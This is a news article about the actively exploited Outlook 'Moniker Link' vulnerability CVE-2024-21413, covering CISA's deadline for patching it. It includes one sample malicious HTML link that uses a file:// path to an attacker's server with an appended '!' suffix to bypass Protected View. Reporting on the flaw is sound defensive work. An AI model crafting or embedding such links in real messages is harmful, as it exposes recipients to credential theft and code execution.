Cybersecurity firm Check Point has discovered a critical remote code execution (RCE) vulnerability in Microsoft Outlook, which is currently being exploited in active cyberattacks, posing a significant threat to organizations worldwide.
This has prompted the Cybersecurity and Infrastructure Security Agency (CISA) to warn the U.S. federal agencies to secure their systems against such ongoing attacks.
Check Point vulnerability researcher Haifei Li discovered the high-severity RCE vulnerability tracked as CVE-2024–21413 (CVSS score 9.8).
This flaw results from improper input validation, which can trigger code execution when opening emails with malicious links using a vulnerable Microsoft Outlook version.
Successful exploitation of this vulnerability would allow a threat actor to bypass the Office Protected View and open malicious files in editing mode rather than protected mode.
It could also grant the threat actor elevated privileges, including the ability to read, write, and delete data.
Microsoft addressed the CVE-2024–21413 vulnerability a year ago, cautioning that the Preview Pane could itself be an attack vector.
As a result, simply viewing a malicious email within Outlook might be enough to trigger the exploit, making it exceptionally dangerous.
According to Check Point, attackers exploit the vulnerability dubbed Moniker Link, a method that tricks Outlook into opening unsafe files.
This allows the threat actors to bypass built-in Outlook protections for malicious links embedded in emails using the file:// protocol.
The attackers can manipulate Outlook to treat malicious files as trusted resources by appending an exclamation mark followed by arbitrary text to a file URL.
By inserting this exclamation mark immediately after the file extension in URLs pointing to attacker-controlled servers, along with some random text, they can deceive the system and execute malicious payloads.
For example, an attacker might craft a link as shown below:
<a href=”file:///\\10.10.111.111\test\test.rtf!something”>CLICK ME</a>
When a victim clicks on the link, Outlook retrieves the file from the attacker’s server and runs it with elevated privileges, granting the attacker control over the system.
The CVE-2024-21413 vulnerability has affected multiple Microsoft Office products, including Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise, Microsoft Outlook 2016, and Microsoft Office 2019.
In response to the active exploitation of this vulnerability, CISA has added CVE-2024-21413 to its Known Exploited Vulnerabilities (KEV) Catalog.
As per the November 2021 Binding Operational Directive (BOD) 22-01, the federal agencies have been given time until February 27, 2025, to patch their systems and protect their networks against potential threats.
“These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise,” the cybersecurity agency warned on Thursday.
With active exploitation in the wild, CVE-2024-21413 presents a severe security risk to Outlook users.
Hence, private organizations are advised to immediately apply patches and reinforce cybersecurity defenses to prevent potential breaches.
